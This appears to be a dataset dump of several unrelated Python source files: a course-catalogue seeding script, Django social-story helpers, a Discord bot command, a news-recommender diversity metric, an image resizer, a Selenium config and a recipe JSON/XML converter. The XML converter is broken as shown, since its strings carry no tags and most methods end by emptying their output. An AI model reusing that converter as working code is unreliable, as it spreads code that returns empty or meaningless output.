'\n\t\t\t\t\t\t\t'Click here for more information.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4710',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Systems Project Management',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Principles and techniques of information systems project management; '\n\t\t\t\t\t\t\t'qualitative and quantitative essentials to include project integration, scope, '\n\t\t\t\t\t\t\t'schedule, cost, quality, human resources, communications, and risk. Practical '\n\t\t\t\t\t\t\t'experience managing a project with complex technology issues.',\n\t\t\t\t\t\t\tprerequisites = 'Junior standing'))\n\ncourses.append(models.Course(course = 'CSC 4797',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Systems Capstone',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Student driven project on the application of an emerging technology '\n\t\t\t\t\t\t\t'that demonstrates learned project management, system design and communication '\n\t\t\t\t\t\t\t'skills. A cumulative experience to complete a student\\'s portfolio of expertise '\n\t\t\t\t\t\t\t'in information systems.',\n\t\t\t\t\t\t\tprerequisites = 'Senior standing; Information Systems majors only'))\n\ncourses.append(models.Course(course = 'CSC 1035',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Databases for Many Majors',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'No background in computing necessary. Design and implementation of '\n\t\t\t\t\t\t\t'your own database as a group project. Cooperative learning techniques to demystify '\n\t\t\t\t\t\t\t'key concepts: the relational model, normalization, the Entity-Relationship model and SQL.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Enrichment Seminar in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4510',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Machine Learning',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'The nature of intelligence and the question of its computer '\n\t\t\t\t\t\t\t'implementation; the nature of learning and how it might be cast as an algorithm; '\n\t\t\t\t\t\t\t'the design of software systems that adapt to new circumstances in their environments.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051'))\n\ncourses.append(models.Course(course = 'CSC 2400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Systems I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Architecture of computer systems: representation of data; processor, '\n\t\t\t\t\t\t\t'memory and I/O organization. Assembly language programming. C programming language '\n\t\t\t\t\t\t\t'constructs and their relationships to the underlying architecture. Basics of operating '\n\t\t\t\t\t\t\t'systems: interrupts, concurrency, process scheduling, security, networking.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 2405',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Systems II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Processes, threads and concurrent programming. Scheduling and Dispatching. '\n\t\t\t\t\t\t\t'Linking and Relocating. Memory management. Virtual memory. System level I/O device '\n\t\t\t\t\t\t\t'management. File systems. Security and protection in depth. Real time and embedded systems. '\n\t\t\t\t\t\t\t'System performance evaluation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 8991',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Graduate Computing Practicum Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8990'))\n\ncourses.append(models.Course(course = 'CSC 1000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'The Practice of Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Anatomy of a computing system including tiny systems such as cell phones; '\n\t\t\t\t\t\t\t'resource management-memory, processes, file structure; network analysis-network topology, '\n\t\t\t\t\t\t\t'performance, privacy, security; application scripting-concepts and practices of programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8541',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Requirements Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Students will practice current techniques of requirements engineering. This '\n\t\t\t\t\t\t\t'class will focus on developing excellent oral and written technical communication skills. '\n\t\t\t\t\t\t\t'Topics may include: requirements elicitation and analysis; requirements specification; test '\n\t\t\t\t\t\t\t'driven development; system modeling; requirements validation; requirements management.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8540'))\n\ncourses.append(models.Course(course = 'CSC 8542',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Design and Evolution',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Students will be introduced to both \"high level\" and \"low level\" design '\n\t\t\t\t\t\t\t'concepts. High level design concepts include client/server and web architectures, mobile '\n\t\t\t\t\t\t\t'computing, the use of common frameworks (e.g. J2EE and .NET), and strategies for evolving '\n\t\t\t\t\t\t\t'software. Low level design concepts include analysis patterns, design patterns, and '\n\t\t\t\t\t\t\t'refactoring approaches. Students will receive a specification, and will design and evolve '\n\t\t\t\t\t\t\t'a solution. This class will continue to emphasize oral and written technical communication '\n\t\t\t\t\t\t\t'skills.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8541'))\n\ncourses.append(models.Course(course = 'CSC 3990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing Research Topics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Centered around the development of a research project in one of several '\n\t\t\t\t\t\t\t'selected computing topics. Experimentation, data collection, literature review. Standard '\n\t\t\t\t\t\t\t'for written presentation of information. Reports of progress required of all students.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 8491',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Data Mining and Database Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The catalog description of this course will be posted soon.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 2020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Development & Technologies I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Design of web content, utilization of web tools, configuration of supporting '\n\t\t\t\t\t\t\t'technologies. Emphasis on client-side services: HTML, style sheets, JavaScript, Document '\n\t\t\t\t\t\t\t'Object Model,DHTML.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 2025',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Development & Technologies II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Design of web content, configuration of supporting web technologies. '\n\t\t\t\t\t\t\t'Emphasis on server-side services: databases and forms, CGI, Perl, PHP, XML, AJAX, cookies '\n\t\t\t\t\t\t\t'and session management, security issues.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1045',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms, Cartoons, and Animation',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Computer-assisted animation & its programming dialects; cartoon creation '\n\t\t\t\t\t\t\t'from story-boarding to product delivery; algorithms - efficiency, correctness, '\n\t\t\t\t\t\t\t'understanding via animation.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'MSE 2000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Evolution and Learning in Computational and Robotic Agents',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Ever wonder how iTunes\\' Genius option figures out what music or movies '\n\t\t\t\t\t\t\t'you might like based on your purchase history? Can home-based medical-care robots learn '\n\t\t\t\t\t\t\t'how to respond to their human patients\\' emotional patterns? This course explores how '\n\t\t\t\t\t\t\t'software designers and artificial intelligence researchers draw inspiration from biology '\n\t\t\t\t\t\t\t'and learning theory to design programs and robotic agents that learn and adapt to changes '\n\t\t\t\t\t\t\t'in their environment. No prior programming experience is required.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\n\n\n\nfor i in courses:\n db.session.add(i)\n\ndb.session.commit()","repo_name":"danieljoyce34/Computer-Science-Dept-Website","sub_path":"populateCourses.py","file_name":"populateCourses.py","file_ext":"py","file_size_in_byte":49793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23329470230","text":"from story.models import StoryPost, StoryLikes\nfrom account.models import Account, Follows\n\nimport datetime\nimport cv2\nimport os\nfrom math import floor\n\n\ndef is_image_aspect_ratio_valid(img_url):\n img = cv2.imread(img_url)\n dimensions = tuple(img.shape[1::-1]) # gives: (width, height)\n # print(\"dimensions: \" + str(dimensions))\n aspect_ratio = dimensions[0] / dimensions[1] # divide w / h\n # print(\"aspect_ratio: \" + str(aspect_ratio))\n if aspect_ratio < 1:\n return False\n return True\n\n\ndef is_image_size_valid(img_url, mb_limit):\n image_size = os.path.getsize(img_url)\n # print(\"image size: \" + str(image_size))\n if image_size > mb_limit:\n return False\n return True\n\n\ndef liked_post(user, story_post):\n return StoryLikes.objects.filter(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first()).exists()\n\n\ndef unlike_post(user, story_post):\n like = StoryLikes.objects.get(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first())\n like.delete()\n return False\n\n\ndef like_post(user, story_post):\n like = StoryLikes(author=Account.objects.filter(email=user.email).first(),\n post=StoryPost.objects.filter(pk=story_post.pk).first())\n like.save()\n return True\n\n\ndef does_user_follow_profile(user, profile_username):\n return Follows.objects.filter(follower_id=Account.objects.get(email=user.email),\n following_id=Account.objects.get(username__iexact=profile_username)).exists()\n\n\ndef unfollow_profile(user, profile):\n follows = Follows.objects.get(follower_id=Account.objects.get(email=user.email),\n following_id=Account.objects.get(username__iexact=profile.username))\n follows.delete()\n return False\n\n\ndef follow_profile(user, profile):\n follows = Follows(follower_id=Account.objects.get(email=user.email).pk,\n following_id=Account.objects.get(username__iexact=profile.username).pk)\n follows.save()\n return True\n\ndef get_time_ago(story_date):\n\n SECOND_MILLIS = 1000\n MINUTE_MILLIS = 60 * SECOND_MILLIS\n HOUR_MILLIS = 60 * MINUTE_MILLIS\n DAY_MILLIS = 24 * HOUR_MILLIS\n\n time = story_date.timestamp() * 1000\n now = datetime.datetime.now().timestamp() * 1000\n\n if time > now or time <= 0:\n return story_date\n\n diff = now - time\n\n if diff < MINUTE_MILLIS:\n return \"just now\"\n\n elif diff < 2 * MINUTE_MILLIS:\n return \"a minute ago\"\n elif diff < 50 * MINUTE_MILLIS:\n return str(floor(diff / MINUTE_MILLIS)) + \" minutes ago\"\n elif diff < 90 * MINUTE_MILLIS:\n return \"an hour ago\"\n elif diff < 24 * HOUR_MILLIS:\n return str(floor(diff / HOUR_MILLIS)) + \"h ago\"\n elif diff < 48 * HOUR_MILLIS:\n return \"yesterday\"\n elif diff < 30 * DAY_MILLIS:\n return str(floor(diff / DAY_MILLIS)) + \" days ago\"\n else:\n return story_date\n\n\ndef get_tags(caption):\n if \"#\" in caption:\n out_str = \"\"\n found_word = False\n\n for c in caption:\n if c == '#':\n found_word = True\n out_str += c\n else:\n if found_word:\n out_str += c\n\n if c == ' ':\n found_word = False\n\n out_str = out_str.replace(\" \", \"\").replace(\"#\", \",#\")\n return out_str[1:]\n\n return \"\"\n","repo_name":"sentrionic/Harmony-Django","sub_path":"story/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70925303844","text":"import nextcord\nfrom nextcord import Interaction\nfrom nextcord.ext import commands, ipc\nfrom discord_bot import DiscordBot#, client\n\nroles_list = ['Преподаватель', 'Модератор']\n\nclass TrackMessage(commands.Cog):\n server_id = None\n\n def __init__(self, client):\n self.client = client\n self.server_id = client.server_id\n\n @nextcord.slash_command(name=\"track_message\", description=\"track_message\", guild_ids=[server_id])\n @commands.has_permissions(administrator=True)\n async def self(self, interaction: Interaction, message_id: str, roles: str):\n check = False\n for member_role in interaction.user.roles:\n for _role in roles_list:\n if member_role.name == _role:\n check = True\n\n if not check:\n await interaction.response.send_message(f\"You don't have permissions\", ephemeral=True, delete_after=3.0)\n return\n\n DiscordBot.track_message(self.client, message_id, roles)\n await interaction.response.send_message(f\"You track message {message_id} with roles: {roles}\", ephemeral=True,\n delete_after=3.0)\n return\n\ndef setup(client):\n client.add_cog(TrackMessage(client))\n","repo_name":"moevm/bsc_ryzhih","sub_path":"discord_bot/cogs/track_message.py","file_name":"track_message.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37939454629","text":"from collections import Counter\nfrom dart.external.discount import harmonic_number\nfrom dart.external.kl_divergence import compute_kl_divergence\nimport numpy as np\n\n\nclass AlternativeVoices:\n \"\"\"\n Class that calculates the number of mentions of minority vs majority people. In the current implementation, what\n entails a minority / majority is hardcoded. In this case, for the implementation for a German media company,\n we calculate both minority/majority of gender and ethnicity. In both cases, we only consider German citizens.\n The required information is obtained by running Named Entity Recognition on a text and retrieving additional\n information about the identified persons from Wikidata.\n Gender:\n majority: male\n minority: non-male\n Ethnicity:\n majority: people with a 'United States' ethnicity or place of birth\n minority: other\n Actual calculation is done following the formula specified in Equation 8 from http://proceedings.mlr.press/v81/burke18a.html\n We recognize there are a multitude of problems with this approach, and welcome suggestions for better ones.\n \"\"\"\n\n def __init__(self):\n self.ethnicity_scores = {}\n self.gender_scores = {}\n self.mainstream_scores = {}\n\n self.minorities = Counter()\n self.majorities = Counter()\n self.irrelevants = Counter()\n\n def get_ethnicity_score(self, indx, article):\n article_majority = 0\n article_minority = 0\n if article.id in self.ethnicity_scores:\n article_majority = self.ethnicity_scores[article.newsid]['majority']\n article_minority = self.ethnicity_scores[article.newsid]['minority']\n else:\n persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n for person in persons:\n if 'citizen' in person and \"United States\" in person['citizen']:\n if 'ethnicity' in person:\n if 'white people' in person['ethnicity'] or person['ethnicity'] == []:\n article_majority += len(person['spans'])\n else:\n article_minority += len(person['spans'])\n else:\n if 'place_of_birth' in person:\n if 'United States' in person['place_of_birth']:\n article_majority += len(person['spans'])\n else:\n article_minority += len(person['spans'])\n self.ethnicity_scores[article.index[0]] = {'majority': article_majority, 'minority': article_minority}\n return article_majority, article_minority\n\n def get_gender_score(self, indx, article):\n article_minority = 0\n article_majority = 0\n if article.id in self.gender_scores:\n article_majority = self.gender_scores[article.newsid]['majority']\n article_minority = self.gender_scores[article.newsid]['minority']\n else:\n persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n for person in persons:\n if 'citizen' in person and \"United States\" in person['citizen']:\n if 'gender' in person:\n if 'male' in person['gender']:\n article_majority += len(person['spans'])\n else:\n article_minority += len(person['spans'])\n self.gender_scores[article.index[0]] = {'majority': article_majority, 'minority': article_minority}\n return article_majority, article_minority\n\n def get_mainstream_score(self, indx, article):\n article_minority = 0\n article_majority = 0\n if indx in self.mainstream_scores:\n article_majority = self.mainstream_scores[indx]['majority']\n article_minority = self.mainstream_scores[indx]['minority']\n else:\n try:\n persons = filter(lambda x: x['label'] == 'PERSON', article.entities)\n except TypeError:\n print(article.entities)\n persons = []\n for person in persons:\n if 'givenname' in person:\n article_majority += len(person['spans'])\n else:\n try:\n article_minority += len(person['spans'])\n except KeyError:\n print(\"huh?\")\n self.mainstream_scores[indx] = {'majority': article_majority, 'minority': article_minority}\n return article_majority, article_minority\n\n def get_dist(self, articles, value, adjusted=False):\n n = len(articles)\n count = 0\n sum_one_over_ranks = harmonic_number(n)\n distr = {0: 0, 1: 0}\n majority = 0\n minority = 0\n for indx, article in articles.iterrows():\n rank = count + 1\n if value == 'gender':\n article_majority, article_minority = self.get_gender_score(indx, article)\n elif value == 'ethnicity':\n article_majority, article_minority = self.get_ethnicity_score(indx, article)\n elif value == 'mainstream':\n article_majority, article_minority = self.get_mainstream_score(indx, article)\n\n if article_minority > 0 and article_majority > 0:\n if adjusted:\n prob_majority = article_majority / (article_majority+article_minority) * 1/rank/sum_one_over_ranks\n prob_minority = article_minority / (article_majority+article_minority) * 1/rank/sum_one_over_ranks\n else:\n prob_majority = article_majority / (article_majority+article_minority)\n prob_minority = article_minority / (article_majority+article_minority)\n majority += prob_majority\n minority += prob_minority\n count += 1\n r = minority + majority\n if r > 0:\n distr[0] = minority / r\n distr[1] = majority / r\n return distr\n\n def calculate(self, full_pool, full_recommendation):\n pool = full_pool.loc[full_pool['category'] == 'news']\n recommendation = full_recommendation.loc[full_recommendation['category'] == 'news']\n\n if not recommendation.empty and not pool.empty:\n # pool_ethnicity = self.get_dist(pool, 'ethnicity', False)\n # recommendation_ethnicity = self.get_dist(recommendation, 'ethnicity', True)\n # ethnicity_inclusion = np.nan\n # if recommendation_ethnicity != {0: 0, 1: 0}:\n # ethnicity_inclusion = compute_kl_divergence(pool_ethnicity, recommendation_ethnicity)\n #\n # pool_gender = self.get_dist(pool, 'gender', False)\n # recommendation_gender = self.get_dist(recommendation, 'gender', True)\n # gender_inclusion = np.nan\n # if recommendation_gender != {0: 0, 1: 0}:\n # gender_inclusion = compute_kl_divergence(pool_gender, recommendation_gender)\n\n pool_mainstream = self.get_dist(pool, 'mainstream', False)\n recommendation_mainstream = self.get_dist(recommendation, 'mainstream', True)\n divergence_with_discount = np.nan\n if recommendation_mainstream != {0: 0, 1: 0}:\n divergence_with_discount = compute_kl_divergence(pool_mainstream, recommendation_mainstream)\n\n recommendation_mainstream = self.get_dist(recommendation, 'mainstream', False)\n divergence_without_discount = np.nan\n if recommendation_mainstream != {0: 0, 1: 0}:\n divergence_without_discount = compute_kl_divergence(pool_mainstream, recommendation_mainstream)\n\n return [divergence_with_discount, divergence_without_discount] # ethnicity_inclusion, gender_inclusion, mainstream_inclusion\n else:\n return\n","repo_name":"svrijenhoek/RADio","sub_path":"dart/metrics/alternative_voices.py","file_name":"alternative_voices.py","file_ext":"py","file_size_in_byte":7977,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"37722594897","text":"from PIL import Image\nimport os\ndir = 'D:/Projects/Code/Python3/Image-autoadjust/QDU-ClassAssistant/PHOTO/'\nif os.path.exists(dir):\n dies = os.listdir(dir)\n for diec in dies:\n print(diec)\n im = Image.open(dir+diec)\n out = im.resize((538,441),Image.ANTIALIAS) #resize image with high-quality\n out.save(dir+diec)\n","repo_name":"iceshadows/CLASS-Assistant","sub_path":"imagesizeadjust.py","file_name":"imagesizeadjust.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26294616874","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nDEBUG = False\nLOG = True\nSKILLS_CS = ['Deep Learning', 'Convolutional Neural Networks', 'TensorFlow', 'Machine Learning', 'Algorithms',\n 'Computer Vision', 'Deep Reinforcement Learning', 'Computer Science', 'Python', 'Matlab',\n 'Recurrent Neural Networks', 'Django', 'Java', 'Keras', 'PyTorch', 'Neural Networks', 'Edge Computing',\n 'OpenCV', 'Scikit-Learn', 'Natural Language Processing', 'Object Detection', 'Reinforcement Learning',\n 'Generative Adversarial Networks']\n\nSKILLS_GM = ['Unity Game Engine', 'Unreal Game Engine', 'Maya', 'Game Mechanics', 'Game Dynamics', 'Aesthetics',\n 'Gamification', 'Level design', 'Loot boxes', 'Intrinsic motivation', 'Oculus', 'Ray Tracing',\n 'Game Narrative', 'Haptic Technology', 'Role Playing Games', 'DLCs']\n\nSKILLS = SKILLS_CS\n\n# Elmo model location for tensorflow hub to load and execute.\nELMO_PATH = \"../word_representation_model/elmo\"\n\n# Bert Rare Word Threshold.\nrare_word_threshold = 2700\n\n# Selenium Config\nHEADLESS = True\nDRIVER_PATH = r\"D:\\Downloads\\chromedriver_win32\\chromedriver.exe\"\noptions = Options()\noptions.headless = HEADLESS\noptions.add_argument(\"--window-size=1920,1200\")\nDRIVER = webdriver.Chrome(executable_path=DRIVER_PATH, options=options)\n\n# Skills summaries extracted information saved file.\nSKILL_INFO_PATH = \"../data/skills_elmo.csv\"\n\n# Rare word skills with embeddings.\nWITH_ELMO = False\nif WITH_ELMO:\n SKILL_WORD_PATH = '../data/skill_words.pkl'\nelse:\n SKILL_WORD_PATH = '../data/skill_words_without_elmo.pkl'\n\n# Test url if needed\nTEST_URL = \"https://www.geeksforgeeks.org/binary-tree-set-1-introduction/\"\n\n# Meta is used to factor the number of skills given by the user.\n# This is used to balance the score based on the number of skill keywords extracted.\nMETA_PATH = \"../data/meta.npy\"\n","repo_name":"sid7vasa/DigitalDetoxAssistant","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4877477097","text":"from abc import ABC, abstractmethod\nimport json\n\n\ndef parse_bool(value):\n if value == \"true\" or value == \"on\":\n return True\n elif value == \"false\" or value == \"off\":\n return False\n raise ValueError\n\n\nclass FormatController:\n def __init__(self, converter_type):\n self.converter = None\n self.set_converter_type(converter_type)\n\n def set_converter_type(self, converter_type):\n if converter_type == \"json\":\n self.converter = JsonFormatConverter()\n elif converter_type == \"xml\":\n self.converter = XmlFormatConverter()\n else:\n raise ValueError\n\n\nclass AbstractFormatConverter(ABC):\n @abstractmethod\n def convert_recipe_list(self, recipes):\n pass\n\n @abstractmethod\n def convert_full_recipe(self, recipes):\n pass\n\n @abstractmethod\n def convert_food_type_list(self, food_types, for_recipes):\n pass\n\n @abstractmethod\n def convert_recipe_ingredients(self, recipe_ingredients):\n pass\n\n @abstractmethod\n def convert_ingredient_list(self, ingredients):\n pass\n\n @abstractmethod\n def convert_preparation_step_list(self, step):\n pass\n\n\nclass JsonFormatConverter(AbstractFormatConverter):\n def convert_recipe_list(self, recipes):\n rep = list(\n map(lambda re: {\"recipe_id\": re.recipe_id, \"name\": re.name, \"image\": re.image, \"rating\": re.get_rating()},\n recipes))\n return json.dumps(rep, ensure_ascii=False)\n\n def convert_full_recipe(self, recipe):\n if recipe.is_author_anonymous:\n author = \"anonymous\"\n else:\n author = recipe.author.nickname\n return json.dumps({\n \"recipe_id\": recipe.recipe_id,\n \"name\": recipe.name,\n \"author\": author,\n \"image\": recipe.image,\n \"preparation_in_minutes\": recipe.preparation_in_minutes,\n \"servings\": recipe.servings,\n \"difficulty\": recipe.difficulty.title,\n \"is_vegetarian\": recipe.is_vegetarian,\n \"is_vegan\": recipe.is_vegan,\n \"is_lactose_free\": recipe.is_lactose_free,\n \"is_gluten_free\": recipe.is_gluten_free,\n \"rating\": recipe.get_rating(),\n \"ingredients\": self.convert_recipe_ingredients(recipe.ingredients),\n \"preparation_steps\": self.convert_preparation_step_list(recipe.steps),\n \"food_types\": self.convert_food_type_list(recipe.food_types, True)\n }, ensure_ascii=False)\n\n def convert_food_type_list(self, food_types, for_recipes):\n result = list(map(lambda ft: {\"name\": ft.name}, food_types))\n if for_recipes:\n return result\n return json.dumps(result, ensure_ascii=False)\n\n def convert_recipe_ingredients(self, ingredients):\n return list(map(lambda ing: {\"name\": ing.ingredient.name, \"value\": ing.value, \"unit\": ing.unit}, ingredients))\n\n def convert_preparation_step_list(self, steps):\n return list(map(lambda st: {\"number\": st.number, \"text\": st.text}, steps))\n\n def convert_ingredient_list(self, ingredients):\n return json.dumps(list(map(lambda ing: {\"name\": ing.name}, ingredients)), ensure_ascii=False)\n\n\nclass XmlFormatConverter(AbstractFormatConverter):\n def convert_recipe_list(self, recipes):\n xml_output = \"\"\n for recipe in recipes:\n xml_output += f\"\"\n xml_output += f\"{recipe.name}\"\n xml_output += f\"{recipe.image}\"\n xml_output += f\"{recipe.get_rating()}\"\n xml_output += \"\"\n xml_output += \"\"\n return xml_output\n\n def convert_full_recipe(self, recipe):\n if recipe.is_author_anonymous:\n author = \"anonymous\"\n else:\n author = recipe.author.nickname\n\n xml_output = f\"\"\n xml_output += f\"{recipe.name}\"\n xml_output += f\"{author}\"\n xml_output += f\"{recipe.image}\"\n xml_output += f\"{recipe.preparation_in_minutes}\"\n xml_output += f\"{recipe.servings}\"\n xml_output += f\"{recipe.difficulty.title}\"\n xml_output += f\"{recipe.is_vegetarian}\"\n xml_output += f\"{recipe.is_vegan}\"\n xml_output += f\"{recipe.is_lactose_free}\"\n xml_output += f\"{recipe.is_gluten_free}\"\n xml_output += f\"{recipe.get_rating()}\"\n xml_output += self.convert_recipe_ingredients(recipe.ingredients)\n xml_output += self.convert_preparation_step_list(recipe.steps)\n xml_output += self.convert_food_type_list(recipe.food_types, True)\n xml_output += f\"\"\n\n return xml_output\n\n def convert_food_type_list(self, food_types, for_recipes):\n xml_output = \"\"\n for ft in food_types:\n xml_output += f\"\"\n xml_output += f\"{ft.name}\"\n xml_output += f\"\"\n xml_output = \"\"\n return xml_output\n\n def convert_recipe_ingredients(self, ingredients):\n xml_output = \"\"\n for ing in ingredients:\n xml_output += f\"\"\n xml_output += f\"{ing.ingredient.name}\"\n xml_output += f\"{ing.value}\"\n xml_output += f\"{ing.unit}\"\n xml_output += f\"\"\n xml_output = \"\"\n return xml_output\n\n def convert_preparation_step_list(self, steps):\n xml_output = \"\"\n for st in steps:\n xml_output += f\"\"\n xml_output += f\"{st.number}\"\n xml_output += f\"{st.text}\"\n xml_output += f\"\"\n xml_output = \"\"\n return xml_output\n\n def convert_ingredient_list(self, ingredients):\n xml_output = \"\"\n for ing in ingredients:\n xml_output += f\"\"\n xml_output += f\"{ing.ingredient.name}\"\n xml_output += f\"\"\n xml_output = \"\"\n return xml_output\n","repo_name":"petrchatrny/receptnik","sub_path":"src/controllers/format_controller.py","file_name":"format_controller.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3681414327","text":"from __future__ import annotations\n\nfrom my_project import db\nfrom my_project.auth.domain.i_dto import IDto\n\nclient_pet = db.Table(\n \"client_pet\",\n db.Column(\"client_Id\", db.Integer, db.ForeignKey(\"client.id\")),\n db.Column(\"pet_id\", db.Integer, db.ForeignKey(\"pet.id\")),\n extend_existing=True\n)\n\n\nclass Client(db.Model, IDto):\n __tablename__ = \"client\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False)\n name = db.Column(db.String(45), nullable=False)\n surname = db.Column(db.String(45), nullable=False)\n contact_number = db.Column(db.String(13), nullable=False)\n address = db.Column(db.String(45), nullable=False)\n email = db.Column(db.String(45), nullable=True)\n additional_contact_info = db.Column(db.String(150), nullable=True)\n\n # Relationship M:M\n pets = db.relationship('Pet', secondary=client_pet, backref=db.backref('clients_association', lazy='dynamic'))\n scheduled_visit = db.relationship('ScheduledVisit', back_populates='client')\n\n def __repr__(self) -> str:\n return f\"Client({self.id}, '{self.name}', '{self.surname}', '{self.contact_number}', '{self.address}',\" \\\n f\" '{self.email}', '{self.additional_contact_info}')\"\n\n def put_into_dto(self) -> dict[str, object]:\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"surname\": self.surname,\n \"contact_number\": self.contact_number,\n \"address\": self.address,\n \"email\": self.email,\n 